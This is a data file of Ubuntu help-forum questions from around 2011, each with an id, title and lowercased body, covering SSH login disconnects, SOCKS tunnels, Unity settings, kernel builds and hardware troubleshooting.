36944	ssh connection closes after successful login	i am trying to run ssh on my computer so i can control it with my android phone . when i scan my local network with overlook fing at my phone i get that my computer is running ssh at port 22 . so i try to connect with connectbot i get : linux linux 2.6.35-28-generic-pae # 50-ubuntu smp fri mar 18 20:43:15 utc 2011 i686 gnu/linux ubuntu 10.10 welcome to ubuntu ! * documentation : https : //help.ubuntu.com/ 0 packages can be updated . 0 updates are security updates . last login : mon apr 25 15:27:36 2011 from linux connection to localhost closed . then a message : `` host has disconnected . close session ? '' when i run ssh user @ localhost at the computer i get the same thing . seems that ssh is setup incorrectly , i get a password prompt and information about the computer , but then the connection instantly close . why ? edit : auth.log : apr 25 15:39:27 linux sshd [ 4932 ] : pam_sm_authenticate : called apr 25 15:39:27 linux sshd [ 4932 ] : pam_sm_authenticate : username = [ user ] apr 25 15:39:27 linux sshd [ 4932 ] : pam_sm_authenticate : /home/user is already mounted apr 25 15:39:27 linux sshd [ 4932 ] : accepted password for user from : :1 port 48442 ssh2 apr 25 15:39:27 linux sshd [ 4932 ] : pam_unix ( sshd : session ) : session opened for user user by ( uid=0 ) apr 25 15:39:27 linux sshd [ 5079 ] : received disconnect from : :1 : 11 : disconnected by user apr 25 15:39:27 linux sshd [ 4932 ] : pam_unix ( sshd : session ) : session closed for user user ssh -vvv user @ localhost : user @ linux : ~ $ ssh -vvv user @ localhost openssh_5.5p1 debian-4ubuntu5 , openssl 0.9.8o 01 jun 2010 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to localhost [ : :1 ] port 22. debug1 : connection established . debug1 : identity file /home/user/.ssh/id_rsa type -1 debug1 : identity file /home/user/.ssh/id_rsa-cert type -1 debug1 : identity file /home/user/.ssh/id_dsa type -1 debug1 : identity file /home/user/.ssh/id_dsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version openssh_5.5p1 debian-4ubuntu5 debug1 : match : openssh_5.5p1 debian-4ubuntu5 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_5.5p1 debian-4ubuntu5 debug2 : fd 3 setting o_nonblock debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug2 : kex_parse_kexinit : diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ssh-rsa-cert-v00 @ openssh.com , ssh-dss-cert-v00 @ openssh.com , ssh-rsa , ssh-dss debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : kex_parse_kexinit : diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ssh-rsa , ssh-dss debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : mac_setup : found hmac-md5 debug1 : kex : server- > client aes128-ctr hmac-md5 none debug2 : mac_setup : found hmac-md5 debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : ssh2_msg_kex_dh_gex_request ( 1024 < 1024 < 8192 ) sent debug1 : expecting ssh2_msg_kex_dh_gex_group debug2 : dh_gen_key : priv key bits set : 146/256 debug2 : bits set : 513/1024 debug1 : ssh2_msg_kex_dh_gex_init sent debug1 : expecting ssh2_msg_kex_dh_gex_reply debug3 : check_host_in_hostfile : host localhost filename /home/user/.ssh/known_hosts debug3 : check_host_in_hostfile : host localhost filename /home/user/.ssh/known_hosts debug3 : check_host_in_hostfile : match line 1 debug1 : host 'localhost ' is known and matches the rsa host key . debug1 : found key in /home/user/.ssh/known_hosts:1 debug2 : bits set : 509/1024 debug1 : ssh_rsa_verify : signature correct debug2 : kex_derive_keys debug2 : set_newkeys : mode 1 debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug2 : set_newkeys : mode 0 debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug2 : service_accept : ssh-userauth debug1 : ssh2_msg_service_accept received debug2 : key : /home/user/.ssh/id_rsa ( ( nil ) ) debug2 : key : /home/user/.ssh/id_dsa ( ( nil ) ) debug1 : authentications that can continue : publickey , password debug3 : start over , passed a different list publickey , password debug3 : preferred gssapi-keyex , gssapi-with-mic , publickey , keyboard-interactive , password debug3 : authmethod_lookup publickey debug3 : remaining preferred : keyboard-interactive , password debug3 : authmethod_is_enabled publickey debug1 : next authentication method : publickey debug1 : trying private key : /home/user/.ssh/id_rsa debug3 : no such identity : /home/user/.ssh/id_rsa debug1 : trying private key : /home/user/.ssh/id_dsa debug3 : no such identity : /home/user/.ssh/id_dsa debug2 : we did not send a packet , disable method debug3 : authmethod_lookup password debug3 : remaining preferred : , password debug3 : authmethod_is_enabled password debug1 : next authentication method : password user @ localhost 's password : debug3 : packet_send2 : adding 64 ( len 57 padlen 7 extra_pad 64 ) debug2 : we sent a password packet , wait for reply debug1 : authentication succeeded ( password ) . debug1 : channel 0 : new [ client-session ] debug3 : ssh_session2_open : channel_new : 0 debug2 : channel 0 : send open debug1 : requesting no-more-sessions @ openssh.com debug1 : entering interactive session . debug2 : callback start debug2 : client_session2_setup : id 0 debug2 : channel 0 : request pty-req confirm 1 debug1 : sending environment . debug3 : ignored env orbit_socketdir debug3 : ignored env ssh_agent_pid debug3 : ignored env term debug3 : ignored env shell debug3 : ignored env xdg_session_cookie debug3 : ignored env windowid debug3 : ignored env gnome_keyring_control debug3 : ignored env gtk_modules debug3 : ignored env user debug3 : ignored env ls_colors debug3 : ignored env libgl_drivers_path debug3 : ignored env ssh_auth_sock debug3 : ignored env defaults_path debug3 : ignored env session_manager debug3 : ignored env username debug3 : ignored env xdg_config_dirs debug3 : ignored env desktop_session debug3 : ignored env libgl_always_indirect debug3 : ignored env path debug3 : ignored env pwd debug3 : ignored env gdm_keyboard_layout debug1 : sending env lang = en_us.utf-8 debug2 : channel 0 : request env confirm 0 debug3 : ignored env gnome_keyring_pid debug3 : ignored env mandatory_path debug3 : ignored env gdm_lang debug3 : ignored env gdmsession debug3 : ignored env shlvl debug3 : ignored env home debug3 : ignored env gnome_desktop_session_id debug3 : ignored env logname debug3 : ignored env xdg_data_dirs debug3 : ignored env dbus_session_bus_address debug3 : ignored env lessopen debug3 : ignored env windowpath debug3 : ignored env display debug3 : ignored env lessclose debug3 : ignored env xauthority debug3 : ignored env colorterm debug3 : ignored env _ debug2 : channel 0 : request shell confirm 1 debug2 : fd 3 setting tcp_nodelay debug2 : callback done debug2 : channel 0 : open confirm rwindow 0 rmax 32768 debug2 : channel_input_status_confirm : type 99 id 0 debug2 : pty allocation request accepted on channel 0 debug2 : channel 0 : rcvd adjust 2097152 debug2 : channel_input_status_confirm : type 99 id 0 debug2 : shell request accepted on channel 0 linux linux 2.6.35-28-generic-pae # 50-ubuntu smp fri mar 18 20:43:15 utc 2011 i686 gnu/linux ubuntu 10.10 welcome to ubuntu ! * documentation : https : //help.ubuntu.com/ last login : mon apr 25 15:39:27 2011 from linux debug1 : client_input_channel_req : channel 0 rtype exit-status reply 0 debug1 : client_input_channel_req : channel 0 rtype eow @ openssh.com reply 0 debug2 : channel 0 : rcvd eow debug2 : channel 0 : close_read debug2 : channel 0 : input open - > closed debug2 : channel 0 : rcvd eof debug2 : channel 0 : output open - > drain debug2 : channel 0 : obuf empty debug2 : channel 0 : close_write debug2 : channel 0 : output drain - > closed debug2 : channel 0 : rcvd close debug3 : channel 0 : will not send data after close debug2 : channel 0 : almost dead debug2 : channel 0 : gc : notify user debug2 : channel 0 : gc : user detached debug2 : channel 0 : send close debug2 : channel 0 : is dead debug2 : channel 0 : garbage collecting debug1 : channel 0 : free : client-session , nchannels 1 debug3 : channel 0 : status : the following connections are open : # 0 client-session ( t4 r0 i3/0 o3/0 fd -1/-1 cc -1 ) debug3 : channel 0 : close_fds r -1 w -1 e 6 connection to localhost closed . transferred : sent 1800 , received 2232 bytes , in 0.4 seconds bytes per second : sent 4972.2 , received 6165.5 debug1 : exit status 0 user @ linux : ~ $
36945	command line thumbnailing	i have a whole folder of photos i want to look at as thumbnails , and i 'd like to do it by calling one of gnome 's native thumbnailers individually , namely totem-video-thumbnailer or evince-thumbnailer , and piping them through a backend ( i hear gstreamer is possible , but anything that allows me to manually call forth a whole foldersworth of thumbnails from the command line will do ) .
36947	how to set dark-toolbars without pixmaps ?	how can i change the color toolbars to dark with engine murrine without using pixmpas including banshee ?
36948	home entertainment/dvr solutions	i 'm setting up a home entertainment computer that will be taking in video input via cable and displaying recorded tv , dvds , live tv , as well as playing music and movies via hdmi to a tv . what media center solutions exist for ubuntu ?
36950	can i upgrade a wubi 10.04 install using a 11.04 install image	i want to eventually update 10.04 to 11.04 on several computers using a usb . i would like to try it first on a non-essential computer , but the most likely candidate is a test box i run a wubi install on . should this work ? do i boot from the usb like i normally would , or is there another procedure ? should this emulate the results i would expect when upgrading a normal install ?
36952	can access nas by ssh in terminal but not through nautilus	i have a synology ds411 and have ssh access through terminal . i 've tried just about every walkthrough for how to connect to an ssh server in nautilus but nothing has worked . any ideas why ? is nautilus using sftp or something for it 's ssh connections ? come to mention it - i have tried setting up ftp connections to the server through nautilus ( i 'm using elementary if it matters ) and it crashes after i enter the password . i can use filezilla with the same connection info fine . not sure why it 's a problem in nautilus . only reason i want to move on from filezilla is very slow transfer speeds . i 'm hoping the ssh would bring better results .
36955	dell inspiron n5010 mic not working	i have a dell inspiron n5010 with ubuntu 10.04 installed , and i canot get the inbuilt or any other microphone to work on it . is it some driver issue ?
36956	gnome 3 shell keyboard/mouse shortcuts	what keyboard or mouse shortcuts for gnome 3 exist ?
36958	how can i autostart a ssh -d tunnel at login for a socks proxy ?	i know that if i want to start an ssh tunnel ssh -d 9000 user @ userserver this is one solution for a dynamic tunnel to be opened on port 9000 for a user named `` user '' on the host `` userserver '' however , how can i automate this process in ubuntu so that i do n't have to open up a terminal every time i log in and start the tunnel ? i want to be ssh 'd the moment i log in . i know i could create a bash file but would n't i have to store my server user 's password in plaintext as i would be prompted for it after the initial command ?
36960	running gmail on chrome in a separate icon on docky ?	i 'm using ubuntu 10.10 with docky . i use google chrome as a default web browser . is there any way that docky has a separate launcher like `` gmail '' with the icon and when i click it , a gmail is launched on chrome-base just like any other mail client ? sorry for my bad english . thank you in advance .
36962	extracting and automating xkeycaps configuration	this is my procedure every time i start my computer : xkeycaps -kbd mac i then swap the downarrow and left shift keys , which in fact switches the left-command and left-option on my mac keyboard . try as i may , i ca n't figure out how to automate this . i 've tried using its xmodmap export feature , i 've tried writing xmodmap files myself , but nothing has any effect . i 'm looking for a way to make this key exchange from the cli so i can put it in a script .
36970	combining old settings files with new ones	i used to have a netbook which has since been upgraded . i was good at backups and have various types ( duplicity/.home dir/single config files saved as exports ) i have setup and been using ubuntu on a new machine for a while and realised i do n't have some of the old info in all of my apps ( specifically filezilla/firefox/nautilus/tomboy etc ) is there any way to import the config/settings files from my backups to the new machine so i have both the old stuff and the new stuff all on the new machine ? is it possible to consolidate my data in this way ?
36971	at what time does cron execute daily scripts ?	if i place a shell script in /etc/cron.daily/ , at what time of the day will it be executed ?
36972	how do i add a picture to a contact ?	i tried to add a picture to a contact , but i do not know how .
36975	how can i fix chrome to minimize into the unity launcher ?	chrome , for the life of me wo n't minimize into the launcher . every time i minimize it it goes away never to be seen again . this is a pain to have to deal with . how can i fix it ? i was using the latest dev edition of chrome .
36978	how to remove the launcher from unity	i would like to remove the launcher from unity , can someone please help me get pointed in the right direction ?
36980	wanting to start development for ubuntu ( and most linux distributions in general ) , which is suitable ? python or vala ?	i 'm a computer science graduate , and learned languages like c , c++ , c # and java . though i have more experience with java . i want to develop for linux and i 'd prefer to develop for gnome , i 'm confused between choosing one from the python and vala . after going through some documentation on vala on gnome live pages , it seems more familiar to me compared to python , which is quite a different syntactically compared to most languages i 've learned during my graduation . while learning curve in vala seems smaller to me . so , which language should i choose to begin development , which has better support in variety of distributions . a recommended ide for suggested language will be appreciated . thanks .
36983	what is the program that suggests installable packages ?	one of the features of ubuntu that i really like is the one that suggests packages to install if you try to run a program that is n't installed , like this : $ nmap the program 'nmap ' is currently not installed . you can install it by typing : sudo apt-get install nmap is that a fancy feature of bash ? an extra daemon that hides in the background ? how does it do that ?
36985	how do i get embedded midi files to play in chrome ?	when i click play on this site ( http : //tones.wolfram.com/ ) , nothing happens . if i download the file to disk , there are several applications installed that play just fine . how do i get chrome to act as expected here ?
36991	which ubuntu flavour is right for my power pc machine ?	i know that there is quite a few `` flavours '' of ubuntu . however , i want to get the most performance out of my machine . i 'm not sure which one to use . specs : ppc 500mhz processor , 384mb ram ( 10.3 osx ) i heard that i can use ubuntu but i should use xbuntu ( because of the low processor and ram ) . i 'm not sure which one to use .
36992	how to add a network drive ?	i was wondering how to add a network drive . my school has a network drive that shares files between students and teachers . i can not figure out how to connect it . i did : smb : \ip address any help ? the server is a windows and running windows 2008 . thanks !
37001	how to use hybrid graphic switch on sony vaio z ?	i got it to install nicely and it 's all working , but i do n't know which graphics card is being used nor how to switch between . i tried installing the official nvidia drivers , but then i could not boot up my computer afterwards so i have not installed them again after doing a reinstall of ubuntu . ps , if you have a grub install failure during install , the key is to tell it where to install the bootloader at the very beginning of the installation , on your partition selection screen ( choose dev/mapper , not the /dev/sda it defaults to ) .
37010	how to fix a build when trying to patch the original file ?	i 'm trying to create a package of bugzilla 4 in a launchpad ppa . keep getting a malformed patch and have redid the patch from ground up numerous times without any success . one of the logs can be seen here ( it 's very long so just ctrl+f for the word fail/ed ) . the error refers to the following lines in my code : diff -naur bugzilla-srcdir.orig//bugzilla.pm bugzilla-srcdir/bugzilla.pm -- - bugzilla-srcdir.orig//bugzilla.pm 2010-11-12 10:27:20.664915051 +0100 +++ bugzilla-srcdir/bugzilla.pm 2010-11-12 10:28:19.721916586 +0100 @ @ -144,7 +144,7 @ @ if ( ! i_am_cgi ( ) & & grep { $ _ eq $ script } shutdownhtml_exit_silently ) { - exit ; + exit ( 0 ) ; } # for security reasons , log out users when bugzilla is down . @ @ -178,7 +178,7 @ @ $ template- > process ( `` global/message. $ extension.tmpl '' , $ vars , \ $ t_output ) || throwtemplateerror ( $ template- > error ) ; print $ t_output . `` \n '' ; - exit ; + exit ( 1 ) ; } } diff -naur bugzilla-srcdir.orig//chart.cgi bugzilla-srcdir/chart.cgi -- - bugzilla-srcdir.orig//chart.cgi 2010-11-12 10:26:25.625929357 +0100 +++ bugzilla-srcdir/chart.cgi 2010-11-12 10:28:19.721916586 +0100 @ @ -79,7 +79,7 @ @ if ( grep ( /^cmd-/ , $ cgi- > param ( ) ) ) { my $ params = $ cgi- > canonicalise_query ( `` format '' , `` ctype '' , `` action '' ) ; print $ cgi- > redirect ( `` query.cgi ? format= '' . $ cgi- > param ( 'query_format ' ) . ( $ params ? `` & $ params '' : `` '' ) ) ; - exit ; + exit ( 0 ) ; } my $ action = $ cgi- > param ( 'action ' ) ; @ @ -102,7 +102,7 @ @ if ( $ action eq `` search '' ) { my $ params = $ cgi- > canonicalise_query ( `` format '' , `` ctype '' , `` action '' ) ; print $ cgi- > redirect ( `` buglist.cgi '' . ( $ params ? `` ? $ params '' : `` '' ) ) ; - exit ; + exit ( 0 ) ; } $ user- > in_group ( bugzilla- > params- > { `` chartgroup '' } ) @ @ -233,9 +233,9 @ @ else { throwusererror ( 'unknown_action ' , { action = > $ action } ) ; } -exit ; +exit ( 0 ) ; # find any selected series and return either the first or all of them . sub getandvalidateseriesids { ignore the time stamps , since i used the packaging source of bugzilla 3.6 in ubuntu natty .
37012	can not restart , reboot , nor shutdown ubuntu 11.04	i can not restart , reboot or shut-down my pc using natty . whenever i hit shut-down , restart or in terminal sudo reboot it shows a black screen . if i should press down the power button for while , it is forced off .
37015	how can i configure the system monitor indicator ( indicator-sysmonitor ) ?	i 'm settling for the system monitor indicator ( indicator-sysmonitor ) for now since there does n't seem to be any good alternative ( for natty ) at the moment ... does anyone know the keyword for disk usage or network usage ? more specifically , when i go to the preferences window for the indicator i see the following string : '' cpu : { cpu } mem : { mem } '' what do i put in the braces if i want to see i/o or network usage ? edit : i could n't handle not seeing my network and disk usage so i put together something that will show that along with the cpu . its one of the answers to this question . it will have to do for a half a year until there is a real monitor .
37016	unable to install , no screens found	im trying to get ubuntu 11.04 beta 2 installed . upon booting from the cd there is a purple screen , `` ubuntu '' and an activity indicator . this goes on for 30 seconds to a minute and then jumps to a teminal/prompt . i do n't know what to do from here ? i have tried `` startx '' but that results in the following errors : ( ee ) screen ( s ) found , but none have a usable configuration . fatal server error : no screens found any advice ?
37023	how do i give ubuntu 11.04 more space ( when installed inside windows 7 ( via wubi ) ) ?	first i have a seperate drive in win7 by shriking the volume of 10 gb then i have installed ubuntu 11.04 via wubi and allocated a space of 5 gb from that 10 gb drive and this 5 gb is becoming less for me i want that the ubuntu take all the 10 gb space of the drive..so how can i resize the ubuntu space ...
37024	is there some place to adjust preferences for unity other than ccsm ?	is there some place to adjust preferences for unity other than ccsm ? for instance my mounted volumes do n't show up in unity . i am guessing i can turn this on somewhere . also i am guessing there is a way to add a custom launcher to unity that is totally obvious but somehow is escaping me . is there an actual manual for unity ?
37032	where do i find information about templates for create document	if i right click on the desktop in unity the context menu has 'create document ' . selecting this , i get the options 'no templates installed ' and 'empty file ' . what kind of templates can i install and where do i put them - or where can i get more information on this ?
37038	how to bridge connections ?	i 'm looking for a way to bridge my connection like the way it 's done in windows . example if i have an internet connection via wifi and want to share that connection to my xbox via ethernet or vice versa also i some times tether off my phone and want to share that connection via ethernet is there a simple way to do this ? i 'm using ubuntu 10.10 32bit laptop anymore info needed just ask .
37040	sound over bluetooth to transit to several blueooth headsets	i would like to watch movies using ubuntu pc , and use a bluetooth usb adapter ( it 's a desktop pc ) as the sound output . then if two or more people come , they can connect with their stereo bluetooth headsets to the pc and can listen to the same sound . is this possible to setup in ubuntu ? . if yes , then how exactly ?
37041	building user-mode-linux uml kernel from source	i have tried building a user-mode-linux kernel using both the source from the ubuntu repository using apt-get and by using the git of the generic kernel . the source code from ubuntu 's repository generated an error during compilation `` error : __supported_pte_mask undeclared ( first use in this function ) '' . this is strange since a running precompiled version of the kernel can be downloaded right from the ubuntu repository . the git code compiles the arch=um just fine but it fails to run . i get an aborted error see below for my compiled version vs the precompiled uml kernel downloaded from ubuntu 's repository . locating the bottom of the address space ... 0x10000 locating the top of the address space ... 0xc0000000 core dump limits : soft - 0 hard - none checking that ptrace can change system call numbers ... ok checking syscall emulation patch for ptrace ... ok checking advanced syscall emulation patch for ptrace ... ok checking for tmpfs mount on /dev/shm ... ok checking prot_exec mmap in /dev/shm/ ... ok checking for the skas3 patch in the host : - /proc/mm ... not found : no such file or directory - ptrace_faultinfo ... not found - ptrace_ldt ... not found uml running in skas0 mode adding 30121984 bytes to physical memory to account for exec-shield gap aborted instead of the following from the built version of the uml kernel in the repository : locating the bottom of the address space ... 0x10000 locating the top of the address space ... 0xc0000000 core dump limits : soft - 0 hard - none checking that ptrace can change system call numbers ... ok checking syscall emulation patch for ptrace ... ok checking advanced syscall emulation patch for ptrace ... ok checking for tmpfs mount on /dev/shm ... ok checking prot_exec mmap in /dev/shm/ ... ok checking for the skas3 patch in the host : - /proc/mm ... not found : no such file or directory - ptrace_faultinfo ... not found - ptrace_ldt ... not found uml running in skas0 mode adding 1142784 bytes to physical memory to account for exec-shield gap initializing cgroup subsys cpuset linux version 2.6.35.1 ( root @ rothera ) ( gcc version 4.4.5 20100813 ( linaro prerelease ) [ release 2010.08-0 ] ( ubuntu/linaro 4.4.4-8ubuntu2 ) ) # 2 mon aug 16 10:45:47 utc 2010 ( ) the steps to build are from https : //wiki.ubuntu.com/kernelteam/gitkernelbuild and from http : //www.ime.usp.br/~baroni/docs/uml-en.html the complete steps that i used are : cd linuxsrc git clone git : //git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux-2.6.git cd linux-2.6 make mrproper make mrproper arch=um make defconfig arch=um make linux arch=um make modules arch=um it is at this point that i attempt to launch my uml kernel with : ./vmlinux ubda=centcow , centos5.6-x86-root_fs mem=256m root=/dev/ubda umid=centos i downloaded the centos filesystem from http : //fs.devloop.org.uk/
37042	after the removal of ubuntu classic in 11.10 , will i be able to install it once again ?	after ubuntu classic is removed in 11.10 ( oneiric ocelot ) , will i be able to re-install it ?
37046	recover from an interrupted 10.04 to 10.10 upgrade ?	i was almost through and downloading the packages and then the system froze up . upon reboot the message was `` gnome-power-manager has configuration defaults not installed properly '' . how do i get my system back ? i have only a blank screen with that message .
37047	what folder are updates kept in so i can sync them ?	i have installed ubuntu 10.10 at my home pc & the same is installed at my office . both are installed on separate partition ex4 . at my home i do n't have net connection , i use mobile to connect some time but could not getting much speed . my office pc have faster net connection through lan where i can update daily . my question is what folder should i copy & pest to my home pc to update as at my office ? what are the simple way to keep my both the installation same ? -thanks in advance
37051	ssh connection `` permission denied '' message	when i execute the command ssh localhost ( in ubuntu 10.10 ) , it will display the error message `` permission denied ( public key ) . '' what may be the problem ? is there any problem in sshd_config file in /etc/ssh ? should passwordauthentication be set to no ? i have set the passwordauthentication to no , but still it gives me the error `` permission denied ( publickey ) . ''
37053	how to recover a removed folder instead of recovering the whole partition	possible duplicates : how to recover deleted files ? best tool to recover removed files i accidentally removed my project under the www folder . i did n't use a version control system ( i know , that 's bad ) . how can i recover my project instead of recovering the whole partition ?
37054	single node cluster installation permission errors	command is bin/start-all.sh hadoop @ user-hp-dx2480-mt-na125pa : /usr/local/hadoop/hadoop $ bin/start-all.sh error are mv : can not move `/usr/local/hadoop/hadoop/bin/../logs/hadoop-hadoop-namenode-user-hp-dx2480-mt-na125pa.out.4 ' to `/usr/local/hadoop/hadoop/bin/../logs/hadoop-hadoop-namenode-user-hp-dx2480-mt-na125pa.out.5 ' : permission denied mv : try to overwrite `/usr/local/hadoop/hadoop/bin/../logs/hadoop-hadoop-namenode-user-hp-dx2480-mt-na125pa.out.4 ' , overriding mode 0644 ( rw-r -- r -- ) ? mv : try to overwrite `/usr/local/hadoop/hadoop/bin/../logs/hadoop-hadoop-namenode-user-hp-dx2480-mt-na125pa.out.3 ' , overriding mode 0644 ( rw-r -- r -- ) ? mv : try to overwrite `/usr/local/hadoop/hadoop/bin/../logs/hadoop-hadoop-namenode-user-hp-dx2480-mt-na125pa.out.2 ' , overriding mode 0644 ( rw-r -- r -- ) ? any solution to this ? ?
37058	how to change vsftpd default port ?	so here 's the deal . i have vsftpd installed and am looking to change the default port to something other than 21 . i 've checked /etc/vsftpd.conf and ca n't find a setting to change the default port . i 'm running ubuntu 10.04 , which does n't have the /etc/vsftp/vsftpd.conf file . the only line i 'm getting in the file that has to do with ports is the following : connect_from_port_20=yes does anyone know if there 's another config file somewhere that i can change the default port on or simply the syntax for a need line to change the port ?
37063	will everything ( downloaded fonts , files , apps etc ) remains the same when i upgrade from one release to the next ?	i 'm planning to upgrade from maverick to natty , and to try out unity , but i do n't want to lose any settings , customizations and downloads in maverick . i just want to know , if upgrading alter anything that i said earlier ? i do n't want to start over with a clean , fresh natty , and i hope i can keep all of my files and folders and settings in maverick , and to have them in natty after the upgrade . is this possible ? should i use update manager to achieve this ? and would all my compiz-settings be reset after i upgrade ? sorry for too much questions , but i 'm asking this because you know , in windows , any version upgrade would require the disk to be reformatted . i hope ubuntu is more convenient than that .
37066	evince print to pdf file fails to print	this is my problem : open a document in evince , choose print choose `` printer '' : `` print to file '' choose `` output format '' : `` pdf '' ( add a filename output.pdf in the box if not there ) click on `` print '' experience the following message : ... failed to print document . printing is not supported on this printer . by the way , printing to an `` output format '' .ps file works fine . what am i missing ?
37069	how do i upgrade from 10.04 to 10.10 in one command by using the terminal ?	hi , i dont want to use the update manager i just want to type one command in a terminal do you understand ? i am at 10.04 and want to upgrade to 10.10 ( and on the 29 of april 11.04 ) in a terminal , can it be done ? $ sudo apt-get dist-upgrade [ sudo ] password for alvar : reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . alvar @ alvars-laptop : ~ $
37070	laptops that will work with ubuntu	following on from my last question 'laptop with nvidia optimus ' i am looking for a new ( current ) laptop with a decent supported graphics card ( preferably nvidia but maybe ati ) to run ubuntu on . i need to know all the hardware will work , ( i do n't mind some tweaking to get things done ) . i have searched online and most of the sites listing compatibility are out of date with both hardware and the versions of linux that are being used . even though lots of work has been put in compiling the information the sites are virtually useless because of the fast pace of development in both hardware and software . probably the best to look is a site like this where there are lots of active users that keep up to date with both hardware and software . what laptops are you all using ( and are confident to recommend to others ) . i have money to spend but after days and weeks of searching i ca n't find reliable info on which to make a purchase . ( recently nvidia optimus has made things more difficult on the graphics card front )
37074	reduce the number of kernels with _grub2_/ubuntu 10.04	dear community ! i need it to do it automagically : in the `` old days '' i just installed the startupmanager and set that that it automaticly only leaved the last 2 fresh kernels , so even if a kernel update came , it did it by itself and i do n't had to care about it ! how could i set this on ubuntu 10.04 with grub2 ? cli or gui solution - it does n't matter thank you !
37083	how can i change the unity launcher delay ?	i find the sidebar to appear and disappear terribly slow . how can i change the delay ?
37084	nvidia driver activated but currently not in use	i have just finished an install of ubuntu 11.04 beta 2 . at the end of the installation i got a message informing that i do not have the required hardware for unity , and that i should choose `` ubuntu classic '' . could someone please shed some light on how to fix this ? i have tried adding the `` experimental 3d xyz '' driver but still no luck . when i log out and try log back in there is no option for unity . my graphics card is an nvidia 240gt or gt240 , i cant remember now which way around it goes . i enabled `` experimental 3d support for nvidia cards '' - this is what i was reffering to above , not a driver - sorry about that .
37085	list of quicklists available for applications	quicklists are the right-click menu a for applications on the unity launcher and it would be nice to have a list of the best quicklists that have been created .
37090	using indicator-appmenu in maximized mode only	i like the mac like global-menu or appmenu whatever you call it . but i was wondering if there is a way that i use it only when i maximize the application window ?
37094	used space in a new empty partition	i 've created an extended partition ( ext4 ) on one of my hard-disks . here is what it looks like : filesystem size used avail use % mounted on /dev/sdc5 158g 5,9g 144g 4 % /media/yahsi why on earth there am i losing 8,1 gb space ? when you add used & avail you do n't get the size .
37097	can apc ups wake powered off machine up when ac power is back ?	i have used apcupsd under ubuntu to power off my machine when ac power is lost via serial . is there any way let the ups to wake up already powered off machine when ac power is back ? i have tried to enabled everything in bios that corresponding to wake up by ring , still no luck .
37105	is there an ubuntu one client for kubuntu ?	is there a ubuntuone client for kubuntu or how do i make ubuntuone work in kubuntu ?
37106	how to disable autohiding for launcher in unity	the launcher appears to slow and disappears to fast how can i disable autohiding behavior of launcher . i use desktop pc
37109	how can i `` downgrade '' gstreamer ?	i use ubuntu 10.04 . ever since i updated gstreamer , movie player does n't work properly anymore and neither does rhythmbox . how can i keep using the previous version of gstreamer that worked ?
37111	how to make firefox main windows have no decorations using devilspie ?	first off , i ca n't run compiz . it does n't work with my old ati . i 'm trying to make all firefox main windows have no decorations . here 's the rule : ( if ( and ( is ( application_name ) `` firefox '' ) ( contains ( window_name ) `` - mozilla firefox '' ) ) ( begin ( println `` match '' ) ( undecorate ) ) ) it will undecorate any open firefox window . as long as one firefox window is open , it will undecorate any new windows . if i close ff and reopen , it is not undecorated . any ideas ?
37112	guake terminal showing up wrong in unity	it seems guake terminal is not aware of the unity sidebar being hidden . even when the sidebar is hidden , it still shows with a left offset that is based on the width of the sidebar . additionally , the width of the terminal is not decreased by the width of the left offset , which causes the terminal to appear on my second monitor as well . is there a way to fix this ?
